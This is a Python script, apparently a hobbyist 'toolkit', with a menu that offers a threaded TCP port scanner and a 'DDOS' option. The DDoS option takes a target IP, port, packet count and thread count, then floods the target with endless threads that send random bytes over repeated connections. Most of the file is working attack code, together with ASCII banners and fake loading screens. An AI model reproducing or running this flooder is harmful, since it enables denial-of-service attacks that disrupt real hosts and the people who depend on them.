import time
import random
import threading
import socket
import concurrent.futures
import os

print("-------------------------------------------")
print("░░░░░░░░░░░░░░███░░███░░███░▐███▌░░░░░░░░░░")
print("░░░░░░░░░░░░░░░█░░░█░█░░░█░░░░█░░░░░░░░░░░░")
print("░░░░░░░░░░░░░░░█░░░███░░░█░░░░█░░░░░░░░░░░░")
print("░░░░░░░░░░░░░░░█░░░█░░░░░█░░░░█░░░░░░░░░░░░")
print("░░░░░█░░░░█░░░███░░█░░░░███░░░█░░░░░░░░░░░░")
print("-------------------------------------------")
print("a tool kit for scaning and DDOSing IPs")
print("by: Ccondir")
print("-------------------------------------------")
print("[1] scan an IP")
print("[2] DDOS an IP")
a = input("")
if a == ("1"):
    os.system("cls")
    print("loading: . . scan ")
    time.sleep(1)
    os.system("cls")
    print("loading: . . scan ")
    print(". ")
    time.sleep(1)
    os.system("cls")
    print("loading: . . scan ")
    print(". . ")
    time.sleep(1)
    os.system("cls")
    print("loading: . . scan ")
    print(". . .")
    time.sleep(1)
    os.system("cls")
    print("loading: . . scan ")
    print(". ")
    time.sleep(1)
    os.system("cls")
    print("loading: . . scan ")
    print(". . ")
    time.sleep(1)
    os.system("cls")
    print("loading: . . scan ")
    print(". . .")
    time.sleep(1)
    os.system("cls")
    print("done")
    time.sleep(2)
    os.system("cls")
    print_lock = threading.Lock()
    print("-------------------------------------------")
    print("░░░░░░░░░░░░░███░███░░██░░█░░█░░░░░░░░░░░░░")
    print("░░░░░░░░░░░░░█░░░█░░░█░░█░██░█░░░░░░░░░░░░░")
    print("░░░░░░░░░░░░░███░█░░░████░████░░░░░░░░░░░░░")
    print("░░░░░░░░░░░░░░░█░█░░░█░░█░█░██░░░░░░░░░░░░░")
    print("░░░░█░░░░█░░░███░███░█░░█░█░░█░░░░░░░░░░░░░")
    print("-------------------------------------------")
    print("made by: Ccondir")
    print("-------------------------------------------")
    ip = input("what IP ya wanna scan?: ")

    os.system("cls")
    print("-------------------------------------------")
    print("░░░░░░░░░░░░░███░███░░██░░█░░█░░░░░░░░░░░░░")
    print("░░░░░░░░░░░░░█░░░█░░░█░░█░██░█░░░░░░░░░░░░░")
    print("░░░░░░░░░░░░░███░█░░░████░████░░░░░░░░░░░░░")
    print("░░░░░░░░░░░░░░░█░█░░░█░░█░█░██░░░░░░░░░░░░░")
    print("░░░░█░░░░█░░░███░███░█░░█░█░░█░░░░░░░░░░░░░")
    print("-------------------------------------------")
    print("made by: Ccondir")
    print("-------------------------------------------")
    def scan(ip,port):
        scanner = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        scanner.settimeout(1)
        try:
            scanner.connect((ip,port))
            scanner.close()
            with print_lock:
                print(f"[{port}] is open, epik")
        except:
            pass

    with concurrent.futures.ThreadPoolExecutor(max_workers=100) as executor:
        for port in range(1000):
            executor.submit(scan, ip, port + 1)
    time.sleep(10)

elif a == ("2"):
    os.system("cls")
    print("loading: . . DDOS ")
    print(". ")
    time.sleep(1)
    os.system("cls")
    print("loading: . . DDOS ")
    print(". . ")
    time.sleep(1)
    os.system("cls")
    print("loading: . . DDOS ")
    print(". . . ")
    time.sleep(1)
    os.system("cls")
    print("loading: . . DDOS ")
    print(". ")
    time.sleep(1)
    os.system("cls")
    os.system("cls")
    print("loading: . . DDOS ")
    print(". . ")
    time.sleep(1)
    os.system("cls")
    print("loading: . . DDOS ")
    print(". . . ")
    time.sleep(1)
    os.system("cls")
    print("done")
    time.sleep(2)
    os.system("cls")
    print("-------------------------------------------")
    print("░░░░░░░░░░░░░░███░░███░░████░███░░░░░░░░░░░")
    print("░░░░░░░░░░░░░░█░░█░█░░█░█░░█░█░░░░░░░░░░░░░")
    print("░░░░░░░░░░░░░░█░░█░█░░█░█░░█░███░░░░░░░░░░░")
    print("░░░░░░░░░░░░░░█░░█░█░░█░█░░█░░░█░░░░░░░░░░░")
    print("░░░░█░░░░█░░░░███░░███░░████░███░░░░░░░░░░░")
    print("-------------------------------------------")
    print("first instalation in the dot dot series")
    print("made by: Ccondir")
    print("-------------------------------------------")
    ip = str(input("[Q] target 1's IP:"))
    port = int(input("[Q] Port(must be an number): "))
    pack = int(input("[Q] packet/s(must be an number): "))
    thread = int(input("[Q] Thread(must be an number): "))
    time.sleep(5)
    os.system("cls")
    print("-------------------------------------------")
    print("░░░░░░░░░░░░░░███░░███░░████░███░░░░░░░░░░░")
    print("░░░░░░░░░░░░░░█░░█░█░░█░█░░█░█░░░░░░░░░░░░░")
    print("░░░░░░░░░░░░░░█░░█░█░░█░█░░█░███░░░░░░░░░░░")
    print("░░░░░░░░░░░░░░█░░█░█░░█░█░░█░░░█░░░░░░░░░░░")
    print("░░░░█░░░░█░░░░███░░███░░████░███░░░░░░░░░░░")
    print("-------------------------------------------")
    print("first instalation in the dot dot series")
    print("made by: Ccondir")
    print("-------------------------------------------")
    time.sleep(5)
    def start():
        hh = random._urandom(10)
        xx = int(0)
        while True:
            try:
                s =socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.connect((ip,port))
                s.send(hh)
                for i in range(pack):
                    s.send(hh)
                xx += 1
                print("yep we attackin "+ip+" | sent: "+str(xx))
            except:
                s.close()
                print(". . done")
                time.sleep(10)
    for x in range(thread):
        thread = threading.Thread(target=start)
        thread.start()
time.sleep(10)
